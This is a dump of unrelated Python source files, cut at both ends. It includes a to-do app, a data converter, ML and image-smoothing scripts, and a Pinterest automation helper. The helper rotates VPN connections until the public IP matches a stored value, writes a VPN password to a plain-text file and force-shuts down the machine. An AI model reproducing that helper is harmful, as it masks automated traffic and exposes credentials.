)\n","repo_name":"Ravdar/blackjack","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3089,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"9264955179","text":"import re\nimport time\nimport requests\nimport subprocess\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\n\ndef explicit_wait(driver, track, ec_params, timeout=35, notify=True):\n if not isinstance(ec_params, list):\n ec_params = [ec_params]\n\n # find condition according to the tracks\n if track == \"VOEL\":\n elem_address, find_method = ec_params\n ec_name = \"visibility of element located\"\n\n find_by = (By.XPATH if find_method == \"XPath\" else\n By.CSS_SELECTOR if find_method == \"CSS\" else\n By.CLASS_NAME)\n locator = (find_by, elem_address)\n condition = EC.visibility_of_element_located(locator)\n\n elif track == \"TC\":\n expect_in_title = ec_params[0]\n ec_name = \"title contains '{}' string\".format(expect_in_title)\n\n condition = EC.title_contains(expect_in_title)\n\n elif track == \"SO\":\n ec_name = \"staleness of\"\n element = ec_params[0]\n condition = EC.staleness_of(element)\n\n # generic wait block\n try:\n wait = WebDriverWait(driver, timeout)\n result = wait.until(condition)\n\n except:\n if notify is True:\n print(\n \"Timed out with failure while explicitly waiting until {}!\\n\"\n .format(ec_name))\n return False\n\n return result\n\n\ndef check_vpn(execute_path):\n p = subprocess.Popen('cmd.exe /c' + '%s\\\\boot\\\\checkvpn.bat abc' % execute_path,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n curline = p.stdout.readline()\n while curline != b'':\n curlines = str(curline).replace('\\\\r\\\\n', '')\n curline = p.stdout.readline()\n p.wait()\n print(curlines)\n if curlines != \"b'network is OK'\":\n return 0\n else:\n return 1\n\n\ndef rasphone_vpn(execute_path):\n p = subprocess.Popen(\"cmd.exe /c\" + '%s\\\\boot\\\\rasphonevpn.bat abc' % execute_path,\n stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n curline = p.stdout.readline()\n while curline != b'':\n # print(curline)\n curline1 = str(curline).replace(\"\\\\r\\\\n\", \"\")\n curline = p.stdout.readline()\n p.wait()\n\n\ndef get_public_ip(agent):\n headers = {\n 'User-Agent': agent,\n }\n url = \"http://200019.ip138.com/\"\n r = requests.get(url, headers=headers)\n ip_text = (r.text).strip()\n ip = re.search(r'\\d+.\\d+.\\d+.\\d+', ip_text).group()\n print('IP:', ip)\n\n return ip\n\n\ndef write_txt_time():\n time_hour = int(time.strftime('%H', time.localtime(time.time()))) * 3600\n time_min = int(time.strftime('%M', time.localtime(time.time()))) * 60\n time_sec = int(time.strftime('%S', time.localtime(time.time())))\n time_str = str(time_hour + time_min + time_sec)\n with open('.\\\\boot\\\\config_time.txt', 'w', encoding='utf-8') as fp:\n fp.write(time_str)\n\n\ndef connect_vpn(conn, agent, vpn, execute_path):\n sql = \"SELECT account, pwd, server, ip FROM vpn WHERE account=%s\"\n result = conn.op_select_one(sql, vpn)\n if result:\n vpn = result['account']\n vpn_pwd = result['pwd']\n vpn_ip = result['ip']\n vpn_server = result['server'].replace('.lianstone.net', '')\n with open(\"%s\\\\boot\\\\vpn.txt\" % execute_path, \"w\", encoding='utf-8') as fp:\n print(vpn_server + \",\" + vpn)\n fp.write(vpn_server + ',' + vpn + ',' + vpn_pwd)\n else:\n print(\n 'No corresponding VPN account has been detected and the system is being shut down...')\n time.sleep(600)\n os.system('Shutdown -s -t 0')\n print('Disconnect the original VPN connection')\n rasphone_vpn(execute_path)\n write_txt_time()\n print('Handling new VPN...')\n check_vpn(execute_path)\n public_ip = get_public_ip(agent)\n write_txt_time()\n while True:\n if public_ip == vpn_ip:\n print('VPN connection IP is correct!')\n break\n else:\n check_vpn(execute_path)\n write_txt_time()\n time.sleep(10)\n public_ip = get_public_ip(agent)","repo_name":"print-hello/Automation","sub_path":"pinterest/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4175,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"32"} +{"seq_id":"29597702068","text":"# -------------------------------------------------#\n# Title: Working with Dictionaries\n# Dev: RRoot\n# Date: July 16, 2012\n# ChangeLog: (Who, When, What)\n# RRoot, 11/02/2016, Created starting template\n# AlyssaMatthews, 10/27/2017, Added code to complete assignment 5\n# -------------------------------------------------#\n\n# -- Data --#\n# objFile = An object that represents a file\n# strData = A row of text data from the file\n# dicRow = A row of data separated into elements of a dictionary {Task,Priority}\n# lstTable = A dictionary that acts as a 'table' of rows\n# strMenu = A menu of user options\n# strChoice = Capture the user option selection\n# strNewTask = A new task entry provided by the user\n# strNewPriority = A new priority entry provided by the user\n# strTask = A string to use when searching for an existing task\n# boolTaskFound = Boolean flag for noting when a task exists in the list\n\n# -- Input/Output --#\n# User can see a Menu (Step 2)\n# User can see data (Step 3)\n# User can insert or delete data(Step 4 and 5)\n# User can save to file (Step 6)\n\n# -- Processing --#\n# Step 1\n# When the program starts, load the any data you have\n# in a text file called ToDo.txt into a python Dictionary.\n\n# Step 2\n# Display a menu of choices to the user\n\n# Step 3\n# Display all todo items to user\n\n# Step 4\n# Add a new item to the list/Table\n\n# Step 5\n# Remove a new item to the list/Table\n\n# Step 6\n# Save tasks to the ToDo.txt file\n\n# Step 7\n# Exit program\n# -------------------------------\n\nstrData = \"\"\ndicRow = {}\nlstTable = []\n\n# Step 1 - Load data from a file\nobjFile = open(\"ToDo.txt\", \"r\")\nfor line in objFile:\n strData = line\n dicRow = {\"task\": (strData.split(\",\")[0]).strip(), \"priority\": (strData.split(\",\")[1]).strip()}\n lstTable.append(dicRow)\nobjFile.close()\n\n\n# Step 2 - Display a menu of choices to the user\nwhile (True):\n print(\"\"\"\n Menu of Options\n 1) Show current data\n 2) Add a new item\n 3) Remove an existing item\n 4) Save Data to File\n 5) Exit Program\n \"\"\")\n strChoice = str(input(\"Which option would you like to perform? [1 to 4] - \"))\n print() # adding a new line\n\n # Step 3 -Show the current items in the table\n if (strChoice.strip() == '1'):\n for dicRow in lstTable:\n print(dicRow[\"task\"] + \",\" + dicRow[\"priority\"])\n continue\n\n # Step 4 - Add a new item to the list/Table\n elif (strChoice.strip() == '2'):\n strNewTask = input(\"Enter a task: \")\n strNewPriority = input(\"Enter the task's priority: \")\n dicRow = {\"task\": strNewTask.title(), \"priority\": strNewPriority.lower()}\n lstTable.append(dicRow)\n continue\n\n # Step 5 - Remove a new item from the list/Table\n elif (strChoice == '3'):\n strTask = input(\"Enter the task you wish to remove: \")\n boolTaskFound = False\n if len(lstTable):\n for dicRow in lstTable:\n if strTask.title() in dicRow[\"task\"]:\n lstTable.remove(dicRow)\n boolTaskFound = True\n print(\"The task\", strTask.title(), \"has been removed\")\n if not boolTaskFound:\n print(\"Task not found\")\n continue\n\n # Step 6 - Save tasks to the ToDo.txt file\n elif (strChoice == '4'):\n objFile = open(\"ToDo.txt\", \"w\")\n if len(lstTable):\n for dicRow in lstTable:\n objFile.write(dicRow[\"task\"] + \",\" + dicRow[\"priority\"] + \"\\n\")\n print(\"Data saved\")\n else:\n print(\"No entries found\")\n objFile.close()\n continue\n\n elif (strChoice == '5'):\n break # and Exit the program\n\n","repo_name":"etwum/Python-Portfolio","sub_path":"Intro_to_Python/Module 05/Peer Review/Assignment05_AlyssaMatthews.py","file_name":"Assignment05_AlyssaMatthews.py","file_ext":"py","file_size_in_byte":3643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8681545198","text":"#!/usr/bin/env python\r\n#!-*-coding:utf-8 -*-\r\n\"\"\"\r\n@version: python3.7\r\n@author: v-enshi\r\n@license: Apache Licence \r\n@contact: 123@qq.com\r\n@site: \r\n@software: PyCharm\r\n@file: train_eval_test.py\r\n@time: 2019/4/28 14:45\r\n\"\"\"\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nimport pickle\r\nimport random\r\nimport numpy as np\r\nimport time\r\ntorch.manual_seed(1)\r\nimport torch.nn.utils.rnn as rnn_utils\r\nfrom torch.utils.data import DataLoader\r\nimport torch.utils.data as data\r\n\r\nfrom model import main_model\r\n\r\ntime_start = time.time()\r\n\r\nuse_gpu = False\r\nuse_gpu = True\r\n\r\n##1. parameters setting\r\nif use_gpu:\r\n device = torch.device(\"cuda\")\r\n max_vocab_size = 50000\r\n CONTEXT_WINDOW = 100\r\n EMBEDDING_value = 512\r\n EMBEDDING_type = 256\r\n HIDDEN_SIZE = 512\r\n BATCH_SIZE = 10\r\n\r\nelse:\r\n device = torch.device(\"cpu\")\r\n max_vocab_size = 100\r\n CONTEXT_WINDOW = 100\r\n EMBEDDING_value = 2\r\n EMBEDDING_type = 3\r\n HIDDEN_SIZE = 5\r\n BATCH_SIZE = 2\r\n\r\n# 2.data loading\r\nclass MyData(data.Dataset):\r\n def __init__(self,data_seq, input_value, input_type, target, parent):\r\n self.input_value = input_value\r\n self.input_type = input_type\r\n self.target = target\r\n self.parent = parent\r\n self.length = len(self.target)\r\n self.data_length = [len(sq) for sq in data_seq]\r\n\r\n\r\n def __len__(self):\r\n return self.length\r\n\r\n def __getitem__(self, idx):\r\n return self.input_type[idx],self.input_value[idx], self.data_length[idx], self.target[idx], self.parent[idx]\r\n#vocabulary\r\nwith np.load(r\"../data/python/vocabulary_trainAndeval_50k.npz\", allow_pickle=True) as arr:\r\n value_vocab = arr['value_vocab'].item()\r\n type_vocab = arr['type_vocab'].item()\r\n\r\n#train\r\n\r\nwith np.load(r\"../data/python/train.npz\", allow_pickle=True) as arr:\r\n input_value = arr['input_value']\r\n input_type = arr['input_type']\r\n parent = arr['parent']\r\n target = arr['target']\r\n\r\n'''\r\nx_train = rnn_utils.pad_sequence(input_value_train, batch_first=True)\r\ny_train = rnn_utils.pad_sequence(input_type_train, batch_first=True)\r\ndataAll_train = MyData(input_value_train, x_train, y_train, target_train, parent_train)\r\n\r\n'''\r\n\r\nprint( input_value)\r\n","repo_name":"s1530129650/Code_Recommendation","sub_path":"source code/train_eval_test.py","file_name":"train_eval_test.py","file_ext":"py","file_size_in_byte":2272,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"28233204952","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Aug 21 22:13:00 2017\n\n@author: Coen.Smits, csmits@unihorn.nl\n\n\"\"\"\n\n#from fwdconvert import conversion\n#from fwdconvert import getDefaults\n\ndef conversion( importfile, CROW_factor ):\n\n from datetime import datetime\n import math \n import re\n import os\n \n # Open file\n file = open(importfile, 'r')\n lines = file.read().split('\\n')\n \n # Get starting date of measurements\n datestring = lines[14].split('\\t')[1]\n date = datetime.strptime(datestring, '%d/%m/%y').timestamp()\n filename = lines[7].split('\\t')[1]\n filename = re.sub('.fwd$', '', filename)\n \n # Setup empty variables\n chainage = []\n lane = []\n longitude_raw = []\n lattitude_raw = []\n timestring = []\n time = []\n num_drops_raw = []\n num_drops = []\n drops = []\n #CROW_factor, last_Location = getDefaults()\n timestring2 = []\n longitudeSplitSpace = []\n lattitudeSplitSpace = []\n longitudeDegree = []\n lattitudeDegree = []\n longitudeDecimal = []\n lattitudeDecimal = []\n filePath = os.path.dirname(importfile)\n \n # Fill variables with measurement data\n for current_line in range(0, len(lines)):\n if lines[current_line] =='$2':\n chainage.append(lines[current_line+1].split('\\t')[1])\n \n lane.append(lines[current_line+2].split('\\t')[1])\n \n longitude_raw.append(lines[current_line+5].split('\\t')[1])\n \n lattitude_raw.append(lines[current_line+5].split('\\t')[2])\n \n num_drops_raw.append(lines[current_line+8].split('\\t')[1])\n num_drops.append(num_drops_raw[len(num_drops_raw)-1].split(' ')[3])\n \n timestring.append(lines[current_line+8].split(' ')[6])\n \n for drop in range(0, int(num_drops[len(num_drops_raw)-1])):\n dropline = (str(len(num_drops_raw)) + '\\t' + lines[current_line+drop+11])\n drops.append(dropline)\n \n for i in range(0,len(timestring)):\n timestring2.append('99/01/01 ' + timestring[i])\n time.append(datetime.strptime(timestring2[i], '%y/%m/%d %H:%M').timestamp()) \n \n longitudeSplitSpace.append(longitude_raw[i].split(' '))\n lattitudeSplitSpace.append(lattitude_raw[i].split(' ')) \n \n if longitudeSplitSpace[i][1] == 'East' and lattitudeSplitSpace[i][1] == 'North':\n \n lattitudeDegree.append(lattitudeSplitSpace[i][2].replace('°', ','))\n lattitudeDegree[i]=lattitudeDegree[i].replace('\\'',',')\n lattitudeDegree[i]=lattitudeDegree[i].replace('\",','')\n \n longitudeDegree.append(longitudeSplitSpace[i][2].replace('°', ','))\n longitudeDegree[i]=longitudeDegree[i].replace('\\'',',')\n longitudeDegree[i]=longitudeDegree[i].replace('\",','')\n \n elif i > 0:\n lattitudeDegree.append(lattitudeDegree[i-1])\n longitudeDegree.append(longitudeDegree[i-1])\n \n else:\n lattitudeDegree.append('52,0,0')\n longitudeDegree.append('5,0,0')\n \n longitude = [[0 for x in range(3)] for y in range(len(longitude_raw))]\n lattitude = [[0 for x in range(3)] for y in range(len(lattitude_raw))] \n \n for y in range (0,len(longitude_raw)):\n for x in range(0,3):\n longitude[y][x] = longitudeDegree[y].split(',')[x]\n \n for y in range (0,len(lattitude_raw)):\n for x in range(0,3):\n lattitude[y][x] = lattitudeDegree[y].split(',')[x]\n \n for i in range(0,len(longitude)):\n longitudeDecimal.append(float(longitude[i][0]) + float(longitude[i][1])/60 + float(longitude[i][2])/3600 )\n lattitudeDecimal.append(float(lattitude[i][0]) + float(lattitude[i][1])/60 + float(lattitude[i][2])/3600 )\n \n # Insert drops-strings in a 2D-array\n deflectiondata = [[0 for x in range(17)] for y in range(len(drops))]\n \n for y in range (0,len(drops)):\n for x in range(0,17):\n deflectiondata[y][x] = drops[y].split('\\t')[x]\n \n # Close .fwd input file \n file.close()\n \n # Create and open output .f25 file\n outputFileName = filePath + '\\\\' + filename + '.f25'\n fileF25 = open(outputFileName, 'w')\n \n # Write header into .f25 file\n file = open('includes\\header.txt', 'r')\n headerLines = file.read().split('\\n')\n \n for i in range(0, 31):\n fileF25.write('%s\\n' % headerLines[i])\n \n fileF25.write('5031,\"%-76s\"\\n' % filename)\n \n for i in range(32, len(headerLines)):\n fileF25.write('%s\\n' % headerLines[i])\n \n # Write data into .f25 file\n dropRowPosition = 0\n for i in range(0, len(num_drops)):\n # Create the lines with loaction and temperature data\n fileF25.write('5280,0, 0,+%2.7f,+00%1.7f,91.7, 4, 10, 100, 0.9 \\n' % (lattitudeDecimal[i], longitudeDecimal[i]) )\n \n # Check if midnight is passed between 2 measurements\n if i >= 1 and time[i] < time[i-1]:\n date = date+86400\n \n fileF25.write('5301,2,1,4,2, %6s,1,1,\"%s \",20%s,%s,%s,%s,%s\\n' % (chainage[i], lane[i], datetime.fromtimestamp(date).strftime('%y'), \\\n datetime.fromtimestamp(date).strftime('%m'), datetime.fromtimestamp(date).strftime('%d'), \\\n datetime.fromtimestamp(time[i]).strftime('%H'), datetime.fromtimestamp(time[i]).strftime('%M')))\n \n if lane[i] == 'R':\n fileF25.write('5302,0,0,A,p,0,0,1,0,\\n')\n elif lane[i] == 'L':\n fileF25.write('5302,0,0,A,p,1,0,0,0,\\n') \n elif lane[i] == 'M':\n fileF25.write('5302,0,0,A,p,0,1,0,0,\\n')\n else:\n fileF25.write('5302,0,0,A,p,0,1,0,0,\\n') \n \n for j in range(0,len(drops)):\n if int(deflectiondata[j][0]) == i+1:\n fileF25.write('5303,0,%5.1f,%5.1f,%5.1f\\n' % (float(deflectiondata[j][15]), float(deflectiondata[j][14]), float(deflectiondata[j][13])))\n break\n \n # Create the lines with deflection data \n for j in range(0,int(num_drops[i])):\n fileF25.write(' %2.0f, %5.0f,%4s.0,%4s.0,%4s.0,%4s.0,%4s.0,%4s.0,%4s.0,%4s.0,%4s.0, %5s0\\n' % (j+1, float(deflectiondata[dropRowPosition][12])/(math.pi*0.15*0.15*CROW_factor), deflectiondata[dropRowPosition][2], \\\n deflectiondata[dropRowPosition][3], deflectiondata[dropRowPosition][4], deflectiondata[dropRowPosition][5], \\\n deflectiondata[dropRowPosition][6], deflectiondata[dropRowPosition][7], deflectiondata[dropRowPosition][8], \\\n deflectiondata[dropRowPosition][9], deflectiondata[dropRowPosition][10], deflectiondata[dropRowPosition][16] ))\n dropRowPosition+=1\n \n # Close output .f25 file\n fileF25.close()\n setNewDefaults(CROW_factor, filePath)\n\ndef getDefaults():\n defaultsFile = open(\"defaults.setup\", 'r')\n defaultsLines = defaultsFile.read().split('\\n')\n CROWfactor = float(defaultsLines[1])\n lastLocation = defaultsLines[4]\n defaultsFile.close()\n return CROWfactor, lastLocation\n\ndef setNewDefaults( CROWfactor, lastPath ):\n import os\n os.remove('defaults.setup')\n outputDefaults = 'defaults.setup'\n newOutputDefaults = open(outputDefaults, 'w')\n newOutputDefaults.write(\"\\# CROW Factor:\\n\")\n newOutputDefaults.write(str(CROWfactor))\n newOutputDefaults.write(\" \\n\")\n newOutputDefaults.write(\" \\n\")\n newOutputDefaults.write(\"# Last used filepath: \\n\")\n newOutputDefaults.write(lastPath) \n newOutputDefaults.write(\"\\n\") \n newOutputDefaults.close()\n\nimport tkinter as tk\nfrom tkinter import ttk\nfrom tkinter.filedialog import askopenfilenames\n\nroot = tk.Tk() \n\n#This is where we lauch the file manager bar.\ndef OpenFile():\n CROW_factor, last_Location = getDefaults()\n files = askopenfilenames(initialdir = last_Location,\n filetypes =((\"fwd files\", \"*.fwd\"),(\"All Files\",\"*.*\")),\n title = \"Choose a file.\"\n )\n fileList = root.tk.splitlist(files)\n print (fileList)\n \n #Using try in case user types in unknown file or closes without choosing a file.\n try:\n for i in range(0,len(fileList)):\n with open(fileList[i],'r'):\n conversion(fileList[i], CROW_factor) \n except:\n print(\"No file exists\") \n \n\nCROW_factor, last_Location = getDefaults()\n\nTitle = root.title( \"Unihorn .fwd to .f25 converter tool\")\nroot.minsize(400,200)\nlabel = ttk.Label(root, text =\"CROW Factor: \" + str(CROW_factor),foreground=\"Black\",font=(\"Helvetica\", 10))\n#label.grid(row=1)\n#e1 = ttk.Entry(root)\n#e1.grid(row=1, column=1)\n#e1.insert(0, CROW_factor)\n\n\nlabel.pack()\n#e1.pack()\n\n\n#Menu Bar\n\nmenu = tk.Menu(root)\nroot.config(menu=menu)\nroot.iconbitmap('includes/Icon1.ico')\n\nfile = tk.Menu(menu, tearoff=False)\n\nfile.add_command(label = 'Open', command = OpenFile)\n#file.add_command(label = 'Exit', command = lambda:exit())\n\nmenu.add_cascade(label = 'File', menu = file)\n\nroot.mainloop()\n","repo_name":"ncsmits/FWD-Converter-UH","sub_path":"FWD_Converter_V2.0.py","file_name":"FWD_Converter_V2.0.py","file_ext":"py","file_size_in_byte":9589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"29201677669","text":"# from GrowingSchedule import HousMinutes\nimport json\n\nclass DataContainer: \n# технологическая карта \n \n _day = 1\n\n\n Week1data = {\"LightLight_1_DurationMinutes\": 1,\n \"LightLight_StartHour\": 12,\n \"LightLight_StartMinute\": 20, \n \n \"PumpDuration\": 1,\n \"PumpStartHours\": 12,\n \"PumpStartMinutes\": 21,\n\n \"TemperatureMin\": 19,\n \"TemperatureMax\": 22,\n \"HunidityMin\": 50,\n \"HunidityMax\": 90,\n\n \"Co2Max\": 800\n }\n\n Week2data = {\"LightLight_1_DurationMinutes\": 1,\n \"LightLight_StartHour\": 12,\n \"LightLight_StartMinute\": 20, \n \n \"PumpDuration\": 1,\n \"PumpStartHours\": 12,\n \"PumpStartMinutes\": 21,\n\n \"TemperatureMin\": 19,\n \"TemperatureMax\": 22,\n \"HunidityMin\": 50,\n \"HunidityMax\": 90,\n\n \"Co2Max\": 800\n }\n Week3data = {\"LightLight_1_DurationMinutes\": 1,\n \"LightLight_StartHour\": 12,\n \"LightLight_StartMinute\": 20, \n \n \"PumpDuration\": 1,\n \"PumpStartHours\": 12,\n \"PumpStartMinutes\": 21,\n\n \"TemperatureMin\": 19,\n \"TemperatureMax\": 22,\n \"HunidityMin\": 50,\n \"HunidityMax\": 90,\n\n \"Co2Max\": 800\n }\n Week4data = {\"LightLight_1_DurationMinutes\": 1,\n \"LightLight_StartHour\": 12,\n \"LightLight_StartMinute\": 20, \n \n \"PumpDuration\": 1,\n \"PumpStartHours\": 12,\n \"PumpStartMinutes\": 21,\n\n \"TemperatureMin\": 19,\n \"TemperatureMax\": 22,\n \"HunidityMin\": 50,\n \"HunidityMax\": 90,\n\n \"Co2Max\": 800\n }\n \n\n def Save(self): \n for item in range(4):\n with open(f\"Data/week_{item+1}_data_file.json\", \"w\") as write_file:\n if(item == 0):\n json.dump(self.Week1data, write_file, indent=4) \n if(item == 1):\n json.dump(self.Week2data, write_file, indent=4)\n if(item == 2):\n json.dump(self.Week3data, write_file, indent=4)\n if(item == 3):\n json.dump(self.Week4data, write_file, indent=4) \n\n with open(\"Data/currentWeekId.json\", \"w\") as week_file: \n json.dump(self._growingWeekNomber, week_file, indent=4) \n\n def GetWeekData(self, week:int):\n with open(f\"Data/week_{week}_data_file.json\", \"r\") as write_file: \n return json.load(write_file) \n\n def GetWeekNomber(self):\n return self._growingWeekNomber\n\n def GetDayNomber(self):\n return self._day\n\n def Load(self):\n for item in range(4):\n with open(f\"Data/week_{item}_data_file.json\", \"r\") as write_file:\n if(item == 0):\n self.Week1data = json.load(write_file) \n\n with open(\"Data/currentWeekId.json\", \"r\")as week_file:\n data = json.load(week_file) \n self._growingWeekNomber = data.get(\"_growingWeek\")\n\nif __name__ == '__main__': \n container = DataContainer()\n container.Save() \n \n print(f\"DataContainer Saved\") \n\n \n\n\n\n\n\n\n\n","repo_name":"MrSpaHrta/Project1","sub_path":"ScheduleData.py","file_name":"ScheduleData.py","file_ext":"py","file_size_in_byte":3596,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"3558340670","text":"import numpy as np\nimport matplotlib.pyplot as plt\nprint(\"Ingrese el nombre de la imagen a suavizar\")\nimagen = input()\nimg = plt.imread(imagen)\nimg = img[:,:,:3]\nX, Y = img.shape[:2]\npi2 = np.pi * 2\nprint(\"Ingrese el ancho de la gaussiana de suavizado medida en pixeles\")\nsigma = float(input())\n\n#Implementación propia de la transformada de fourier bidimensional\ndef bifourier(array):\n\t(M, N) = array.shape[:2]\n\tfourier = np.zeros((M,N), dtype = complex)\n\tfor k in range(M):\n\t\tfor l in range(N):\n\t\t\tsuma = 0.0\n\t\t\tfor m in range(M):\n\t\t\t\tfor n in range(N):\n\t\t\t\t\tt = np.exp(- 1j * pi2 * ((k * m) / M + (l * n) / N))\n\t\t\t\t\tsuma += array[m,n] * t\n\t\t\t\tfourier[l][k] = suma\n\treturn np.transpose(fourier)\n\n#Implementación propia de la inversa de la transformada de fourier bidimensional\ndef invbifourier(array):\n\t(M, N) = array.shape[:2]\n\timagen = np.zeros((M,N), dtype = complex)\n\tfor m in range(M):\n\t\tfor n in range(N):\n\t\t\tsuma = 0.0\n\t\t\tfor k in range(M):\n\t\t\t\tfor l in range(N):\n\t\t\t\t\tt = np.exp(1j * pi2 * ((k * m) / M + (l * n) / N))\n\t\t\t\t\tsuma += array[l][k] * t\n\t\t\tval = suma / (M*N)\n\t\t\timagen[m, n] = val\n\treturn np.transpose(imagen)\n\n#Creación del Kernel gaussiano\ndef gaussian(sig):\n\tt = np.linspace(-10, 10, 20)\n\tgauss = np.exp(-1*(1/2*sig**2)*t**2)\n\tgauss /= np.sum(gauss) # Se normaliza el kernel\n\tkernel = gauss[:, np.newaxis] * gauss[np.newaxis, :]\n\tgaussiana = np.zeros((X,Y))\n\tgaussiana[:kernel.shape[0],:kernel.shape[1]] = kernel\n\treturn gaussiana\n\n# Transformada de fourier del kernel, que resulta ser una gaussiana\nkernel_ft = bifourier(gaussian(sigma)) #Usando mi propia implementación. \n\n# Fourier de la imagen\nimg_ft1 = bifourier(img[:,:,0]) #Usando mi implementación. MM\nimg_ft2 = bifourier(img[:,:,1])\nimg_ft3 = bifourier(img[:,:,2])\nimg_ft = np.zeros((X,Y,3), dtype = complex)\nfor i in range(X):\n\tfor j in range(Y):\n\t\timg_ft[i,j,0] = img_ft1[i,j]\n\t\timg_ft[i,j,1] = img_ft2[i,j]\n\t\timg_ft[i,j,2] = img_ft3[i,j]\n\t\n# Se realiza la convolución. Se acomoda para que las dimensiones del kernel concuerden con la tercera dimension de la imagen (espectro de colores)\nimg2_ft = kernel_ft[:, :, np.newaxis] * img_ft\nimg21 = invbifourier(img2_ft[:,:,0]).real #Usando mi implementación. MM\nimg22 = invbifourier(img2_ft[:,:,1]).real\nimg23 = invbifourier(img2_ft[:,:,2]).real\nimg2 = np.zeros((X,Y,3), dtype = float)\nfor i in range(X):\n\tfor j in range(Y):\n\t\timg2[i,j,0] = img21[i,j]\n\t\timg2[i,j,1] = img22[i,j]\n\t\timg2[i,j,2] = img23[i,j]\n\n# Se acotan los valores al rango esperado\nimg2 = np.clip(img2, 0, 1)\n\n# Se hace una gráfica de lo obtenido\nplt.figure()\nplt.imshow(img2)\nplt.axis('off')\nplt.grid(False)\nplt.savefig(\"suave.png\")\n\n","repo_name":"CamiloBalaguera/CamiloBalaguera_taller4","sub_path":"punto_1/suaveMI.py","file_name":"suaveMI.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"39003150058","text":"import matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n\ndef calculate_categorical_crossentropy_loss(predictions, ground_true):\n losses = []\n for prediction, ground in zip(predictions, ground_true):\n loss = 0\n for y_p, y in zip(prediction, ground):\n if y > 0:\n loss -= y * np.log(y_p)\n losses.append(loss)\n return losses\n\n\ndef loss2weight(losses, scaling_type=\"const\", factor=2):\n min_loss = min(losses)\n print(factor)\n if scaling_type == \"const\":\n weights = [i / min_loss for i in losses]\n\n max_weight = max(weights)\n print(max_weight)\n weights = [i * factor / max_weight for i in weights]\n\n avg_weight = sum(weights) / len(weights)\n weights = [i / avg_weight for i in weights]\n\n if scaling_type == \"relative\":\n weights = [i / min_loss for i in losses]\n\n max_weight = max(weights)\n min_weights = min(weights)\n diff = max_weight - min_weights\n print(max_weight)\n weights = [i + (factor) * (i - min_weights) / diff * i for i in weights]\n\n avg_weight = sum(weights) / len(weights)\n weights = [i / avg_weight for i in weights]\n\n return weights\n\n\ndef similarity_matrix(df):\n prediction_collumns = []\n samples, predictions = 0, 0\n for collumn_name in list(df):\n if \"true_label\" in collumn_name:\n prediction_collumns.append(collumn_name)\n samples += 1\n elif \"prediction\" in collumn_name:\n prediction_collumns.append(collumn_name)\n predictions += 1\n\n if predictions % samples:\n raise ValueError(\"number of predictions per sample must be the same\")\n\n class_number = predictions // samples\n print(f\"sample number: {samples} class_number: {class_number}\")\n probabilities = df[df.columns.intersection(prediction_collumns)]\n\n predictions = []\n\n for index, row in probabilities.iterrows():\n prediction_list = list(row.values)\n predictions.append(\n [\n prediction_list[i * class_number : (i + 1) * class_number].index(\n max(prediction_list[i * class_number : (i + 1) * class_number])\n )\n for i in range(samples)\n ]\n )\n\n similarity = []\n for i in range(probabilities.shape[0]):\n print(i)\n similarity.append([])\n for j in range(probabilities.shape[0]):\n similarity_value = (\n sum(list(map(lambda a, b: a == b, predictions[i], predictions[j])))\n / samples\n )\n similarity[i].append(similarity_value)\n labels = [str(i + 1) for i in range(probabilities.shape[0])]\n # print(similarity)\n\n return pd.DataFrame(similarity, index=labels, columns=labels)\n\n\n# Modified example from https://matplotlib.org/stable/gallery/images_contours_and_fields/image_annotated_heatmap.html\ndef heatmap(data, row_labels, col_labels, ax=None, cbar_kw={}, cbarlabel=\"\", **kwargs):\n \"\"\"\n Create a heatmap from a numpy array and two lists of labels.\n\n Parameters\n ----------\n data\n A 2D numpy array of shape (N, M).\n row_labels\n A list or array of length N with the labels for the rows.\n col_labels\n A list or array of length M with the labels for the columns.\n ax\n A `matplotlib.axes.Axes` instance to which the heatmap is plotted. If\n not provided, use current axes or create a new one. Optional.\n cbar_kw\n A dictionary with arguments to `matplotlib.Figure.colorbar`. Optional.\n cbarlabel\n The label for the colorbar. Optional.\n **kwargs\n All other arguments are forwarded to `imshow`.\n \"\"\"\n\n if not ax:\n ax = plt.gca()\n\n # Plot the heatmap\n im = ax.imshow(data, **kwargs)\n\n # Create colorbar\n cbar = ax.figure.colorbar(im, ax=ax, **cbar_kw)\n cbar.ax.set_ylabel(cbarlabel, rotation=-90, va=\"bottom\")\n\n # We want to show all ticks...\n ax.set_xticks(np.arange(data.shape[1]))\n ax.set_yticks(np.arange(data.shape[0]))\n # ... and label them with the respective list entries.\n ax.set_xticklabels(col_labels)\n ax.set_yticklabels(row_labels)\n\n # Let the horizontal axes labeling appear on top.\n ax.tick_params(top=True, bottom=False, labeltop=True, labelbottom=False)\n\n # Rotate the tick labels and set their alignment.\n plt.setp(ax.get_xticklabels(), rotation=-30, ha=\"right\", rotation_mode=\"anchor\")\n\n # Turn spines off and create white grid.\n for edge, spine in ax.spines.items():\n spine.set_visible(False)\n\n ax.set_xticks(np.arange(data.shape[1] + 1) - 0.5, minor=True)\n ax.set_yticks(np.arange(data.shape[0] + 1) - 0.5, minor=True)\n ax.grid(which=\"minor\", color=\"w\", linestyle=\"-\", linewidth=3)\n ax.tick_params(which=\"minor\", bottom=False, left=False)\n\n return im, cbar\n\n\ndef annotate_heatmap(\n im,\n data=None,\n valfmt=\"{x:.2f}\",\n textcolors=[\"black\", \"white\"],\n threshold=None,\n **textkw,\n):\n \"\"\"\n A 